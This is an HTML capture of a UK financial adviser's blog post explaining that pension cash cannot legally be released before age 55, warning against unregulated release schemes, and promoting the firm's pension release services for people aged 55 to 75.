id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n										</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Can I sell my Pension under 55?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/pensions/\" title=\"Pensions\">Pensions</a></li><li>Can I sell my Pension under 55?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n												<div id=\"post-776\" class=\"post-776 post type-post status-publish format-standard hentry category-pensions post\">&#13;\n												<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h2>FAS<a href=\"#\"/>T FACTS</h2>&#13;\n<p> </p>&#13;\n<p><span style=\"color: #000000;\">#1: </span><span style=\"color: #000000;\">It’s</span> illegal to take money out of your pension fund before you are 55 years old.</p>&#13;\n<p><span style=\"color: #000000;\">#2: </span>There are dubious companies out there who will tell you otherwise – but it is against the law.</p>&#13;\n<p><span style=\"color: #000000;\">#3:</span>  With a pension release, you can set free up to 25% of your pension fund in cash if you are over 55 and meet the criteria.</p>&#13;\n<p><span style=\"color: #000000;\">#4: </span>You could use this to pay off debt, take a dream holiday, treat your children – anything you wish.</p>&#13;\n<p><span style=\"color: #000000;\">#5: </span>Equity SMART can answer all your questions when it comes to <a href=\"../pensions/pension-release/\" target=\"_blank\">pension release</a> – all you have to do is ask.</p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span9 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<h2><span style=\"color: #000000;\">IF YOU WANT TO RELEASE CASH FROM YOUR PENSION – READ THIS FIRST!</span></h2>&#13;\n<p>Firstly, it is <span style=\"color: #ff0000;\">illegal</span> to take money out of a pension fund before you reach the age of 55.</p>&#13;\n<p><big>By  Strategic Development Director Equity SMART</big></p>&#13;\n<hr/></div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p><big>This is despite all the information you may find online telling you different through many dubious offers of cash backs, loans and all sorts of offshore schemes – with little attention paid to the pension rules and consequences to you.</big></p>&#13;\n<p><big>But don’t take our word for it. See what this recent update from the <a href=\"http://www.thepensionsregulator.gov.uk/press/pn12-05.aspx\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://www.thepensionsregulator.gov.uk\']);\" target=\"_blank\">Pensions Regulator</a> says with regard to pension release before the age of 55.</big></p>&#13;\n<div class=\"wpb_alert wpb_content_element  wpb_alert-error\">&#13;\n<div class=\"messagebox_text\">&#13;\n<p><big>The Pension Schemes usually claim to be able to access your pension before the age of 55 and do this through overseas transfers, overseas investments or by way of a loan from your existing arrangement. All versions can incur high fees, potential charges and penalties from HMRC and they stray into illegal dealings when concerning pensions. Not only that, but they leave the consumer with little or no pension provision in retirement.</big></p>&#13;\n</div>&#13;\n</div>&#13;\n<p><big>So – you might now be wondering</big> <big>if there is any way in which you <em>can</em> cash in some or all of your pension before you reach 55. For most people – it’s a straight ‘no’.</big></p>&#13;\n<p><big>The cases in which it can legally occur are based on a few specific individual circumstances.</big></p>&#13;\n<p><big>One of these is the unfortunate predicament of having to retire early due to ill health for example having a terminal illness. Or it may be due to a pension scheme that relates to a specific form of employment – for instance in the armed forces, or professional football – where the career-spans are relatively short.</big></p>&#13;\n<p><big>Or it might be that you bought a specialised pension scheme that contains a right to access the cash from the age of 50. They do exist – </big></p>&#13;\n<p><big>So it’s well worth checking through the terms and conditions of your pension plan and we would recommend that you get in touch with your own pension provider to discuss your options.  </big></p>&#13;\n<p><big>But what are the potential consequences to consumers who transfer their pension and release via these unregulated companies?</big></p>&#13;\n<blockquote>&#13;\n<ul><li><big>Individuals are likely to be poorer in retirement. This is based on both the impact of releasing cash and the potential of high losses on the balance of the pension pot which has been eroded by unnecessary high charges.</big></li>&#13;\n<li><big>They may also face substantial tax charges and penalties from HMRC. These would be based on generous tax reliefs having been misused on pensions already built up.</big></li>&#13;\n<li><big>Still not convinced? please see <a href=\"http://www.pensionsadvisoryservice.org.uk/media/826600/members_leaflet.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.pensionsadvisoryservice.org.uk/media/826600/members_leaflet.pdf\']);\" target=\"_blank\">latest consumer advice leaflet</a> it has all the detail you need to know.</big></li>&#13;\n</ul></blockquote>&#13;\n<p><big>So we know the position for those under age 55 – but what about everyone else?</big></p>&#13;\n<h5>That’s what understanding pension release is all about… balance</h5>&#13;\n<p><big>We understand it’s a tough economy with the finances of many consumers stretched to the limit. In these times of need you may find yourself tempted to reach out to almost anyone who is saying that they can offer help.</big></p>&#13;\n<p><big>This is certainly the case with <span style=\"text-decoration: underline;\">unregulated online pension release companies</span> who are working outside the rules by offering what appear to be legitimate schemes to unlock cash from your pension while you are under the age of 55 – leaving you with no protection from the Financial Services Compensation Scheme.</big></p>&#13;\n<h5><span style=\"padding: 0px 4px; background-color: #fdf957;\">So has this got you worrying about the pension scheme you’re currently in?</span></h5>&#13;\n<p><big>It could be that you are one of the scant few people in a position to withdraw money from your pension prior to your 55th birthday. Or you may now be holding onto your pension ready to set it free on the big day! But is that really the right choice for you?</big></p>&#13;\n<p><big>Take a look at your current pension scheme.</big> <big>If you want to improve on poor investment returns and reduce unnecessary charges that are eroding your pension pot – then maybe a <a href=\"../pensions/pension-transfer/\" target=\"_blank\">pension transfer</a> is a wiser option for you at this stage.</big></p>&#13;\n<p><big>We can help by analysing your current plan alongside others that are out there – and see if we can find you a better return. Our experienced and personal touch means it’s a lot easier to achieve than you might think – so why not get in contact and see how a pension transfer could potentially set you up for a better future.</big></p>&#13;\n<p><big>So – given all the stories in the media and the information outlined above, you might be coming to the conclusion that a pension release is a bad choice for everyone – but that is simply not the case.</big></p>&#13;\n<h2>If you are <span style=\"text-decoration: underline;\">over</span> 55 – it could be good news!</h2>&#13;\n<p><big>Unlocking cash from your pension can be an excellent opportunity to make a real difference towards making you more financially secure, at a time in your life when you need it most.</big></p>&#13;\n<p><big>What we are about to tell you is NOT “theory”, unregulated or illegal. These are practical, reliable strategies proven to help you release cash from your pension today that can change your life for the better.</big></p>&#13;\n<blockquote><p><big>In order to qualify for Pension Release, you must satisfy the following criteria:</big></p>&#13;\n<ul><li><big>You must be aged between 55 and 75</big></li>&#13;\n<li><big>You must have pension benefits other than your State Pension</big></li>&#13;\n<li><big>You cannot be in receipt of these pension benefits already</big></li>&#13;\n<li><big>You pension benefits cannot relate to your current employer</big></li>&#13;\n</ul></blockquote>&#13;\n<h2>If you have answered YES to these Criteria…</h2>&#13;\n<p><big>Then you may be interested in the extraordinary opportunity to  release up to 25% of your pension fund in cash – money that you can use for any number of reasons:</big></p>&#13;\n<p><big>Paying off debt. Paying a lump sum off a mortgage. A dream holiday. Or maybe to pay for a family wedding…</big></p>&#13;\n<p><big>Of course the list is endless in the practical application of your new found cash but we find that clients experience much more than this – they achieve one or any number of the following things.</big></p>&#13;\n<div class=\"wpb_alert wpb_content_element  wpb_alert-success\">&#13;\n<div class=\"messagebox_text\">&#13;\n<ul><li><big>The beginning of a fresh start and the antidote to experiencing less hassle, strain, anxiety and aggravation in their lives.</big></li>&#13;\n<li><big>Having the choice to change life for the better – possibly choosing to work less thanks to now being able to top up other employed income.</big></li>&#13;\n<li><big>Ensuring they don’t miss out on important time with their family, children and grandchildren.</big></li>&#13;\n<li><big>Changing their future through financial liberty that provides true freedom.</big></li>&#13;\n<li><big>Being able to do more things that you wanted to do but never had the time or income.</big></li>&#13;\n</ul></div>&#13;\n</div>&#13;\n<p><big>Pension Release doesn’t have to be all doom and gloom. We work hard all our lives to give us nice things to look forward to, and you should ask yourself whether you’ll get more enjoyment from releasing money early rather than leaving it in a pension fund.</big></p>&#13;\n<p><big>Some of those dreams may be be restricted in the later years, possibly due to ill health or family commitments.</big></p>&#13;\n<p><big>So… you have a golden box worth <span style=\"color: #ff6600;\">25%</span> of your pension pot available now after being locked away for years.</big></p>&#13;\n<p><big>The only thing to do now is find a trustworthy advisor who will not only safely release the money you need if suitable, but will work extremely hard to manage the money you have left in your pension so you can still retire with the knowledge that you won’t be left short.</big></p>&#13;\n<p><big>You’ll be so glad that you didn’t wait until you were 65 to make the most of your pension and realise your dreams now while you still have them!</big></p>&#13;\n<p><big>Click the button below to send us a message and we will get back to you as soon as we possibly can.</big></p>&#13;\n<p><big> Warmest Regards</big></p>&#13;\n<p><strong style=\"line-height: 1.5em;\"><big/></strong></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  <div class=\"wpb_separator wpb_content_element \"/>&#13;\n <div class=\"wpb_call_to_action wpb_content_element clearfix cta_align_right\"><a class=\"wpb_button_a\" href=\"../pensions/pension-release/\"><span class=\"wpb_button  wpb_btn-success wpb_btn-large\">Get Started Today</span></a><h2 class=\"wpb_call_text\">Find Out More About Pension Release Here...</h2></div> &#13;\n &#13;\n		</div> &#13;\n	</div> &#13;\n </div> <div class=\"wpb_row vc_row-fluid \"> &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p>Monthly Articles &amp; Information</p>&#13;\n<p>Keep up with the latest annuity news and articles with a useful newsletter from Equity SMART.</p>&#13;\n<p>You’ll be given lots of valuable information on wealth management news and products. Sign up now and get a copy of our Smart Money guide FREE. Just enter your email below:</p>&#13;\n<div class=\"wpcf7\" id=\"wpcf7-f2512-p776-o1\"><form action=\"../can-i-sell-my-pension-under-55/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"2512\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7.1\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f2512-p776-o1\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"db06ac6257\"/></div>&#13;\n<p>Your Email (required)<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"30\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p><input type=\"submit\" value=\"Download\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p style=\"text-align: center;\"><em><span style=\"font-size: medium;\">A Guide To…</span></em></p>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Achieving Financial Independence</span></p>&#13;\n<p style=\"text-align: center;\"><img style=\"border: currentColor !important; background-color: transparent !important;\" alt=\"\" src=\"../wp-content/plugins/InstaBuilder/images/graphics/arrow-3.png\" width=\"131\" height=\"72\" border=\"0\"/></p>&#13;\n<p style=\"text-align: center;\"/><div class=\"wpcf7\" id=\"wpcf7-f3692-p776-o2\"><form action=\"../can-i-sell-my-pension-under-55/\" method=\"post\" class=\"wpcf7-form\" novalidate=\"novalidate\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"3692\"/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.7.1\"/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"\"/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f3692-p776-o2\"/><input type=\"hidden\" name=\"_wpnonce\" value=\"7881f1ec77\"/></div>&#13;\n<p/>&#13;\n<p>First Name<br/><span class=\"wpcf7-form-control-wrap firstname\"><input type=\"text\" name=\"firstname\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\"/></span></p>&#13;\n<p>Your Email (required)<br/><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"email\" name=\"your-email\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\"/></span> </p>&#13;\n<p><input type=\"hidden\" name=\"_wpcf7_captcha_challenge_captcha-357\" value=\"1786803610\"/><br/><span class=\"wpcf7-form-control-wrap captcha-357\"><input type=\"text\" name=\"captcha-357\" value=\"\" size=\"18\" class=\"wpcf7-form-control wpcf7-captchar\" aria-invalid=\"false\"/></span></p>&#13;\n<p><input type=\"submit\" value=\"Download\" class=\"wpcf7-form-control wpcf7-submit\"/></p>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"/></form></div>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n &#13;\n	<div class=\"vc_span6 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n<p> </p>&#13;\n<p><span style=\"color: #99cc00;\">  </span></p>&#13;\n<p>Strategic Development Director </p>&#13;\n<p/>&#13;\n<p> </p>&#13;\n<p>Sam is a respected leadership authority, finance &amp; insurance expert, writer and marketer.</p>&#13;\n<p>His success through some of the worst economies is built upon a lifetime of accomplishment and first hand experiences including, building from start up to one of the leading pioneers and multi award winning providers of mortgage and insurance services to UK consumers derived over the Internet.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Sam has dedicated his life to challenging conventional wisdom that consumers are not engaged with Financial Services, he believes they are, it’s just that we sell promises – with some products the customer can be confident of delivery but not with all products – we over focus on price and then complain when consumers do.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">This lack of clarity and mixed messages stifles innovation, transparency and consumer trust.</span></p>&#13;\n&#13;\n		</div> &#13;\n	</div>  &#13;\n		</div> &#13;\n	</div> &#13;\n </div>&#13;\n							</div>&#13;\n						<div class=\"meta-info\">&#13;\n				<div class=\"alignleft vcard\">&#13;\n					<span class=\"fn\">By <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span><a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a><span class=\"sep\">|</span><a href=\"../can-i-sell-my-pension-under-55/\" title=\"Comment on Can I sell my Pension under 55?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?s=100&amp;p[url]=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/&amp;p[title]=Can%20I%20sell%20my%20Pension%20under%2055?\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Can%20I%20sell%20my%20Pension%20under%2055?%20http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/&amp;title=Can%20I%20sell%20my%20Pension%20under%2055?\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																									<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n																				<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Can I sell my Pension under 55?&amp;body=http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n						My passion is learning about new ideas, processes, approaches and technologies, then looking at the design and implementation of them into our working day. I combine this with my role as Protection Specialist were I always put my clients needs first, a philosophy that has served me well over the last 25 years in providing total peace of mind to a loyal client base of private clients, families and their businesses					</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n											&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../can-i-sell-my-pension-under-55/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"776\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"bbd0bbdbc6\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n	<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">&#13;\n										<img width=\"52\" height=\"34\" src=\"../wp-content/uploads/2013/02/photodune-2677721-big-ben-s2-e1361782596271.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"goverment report on care home costs uk\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../will-you-avoid-care-home-costs/\">Will You Avoid Care Home Costs?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 23rd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../better-pension-drawdown-annuity/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a>&#13;\n									<div class=\"meta\">&#13;\n										February 26th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									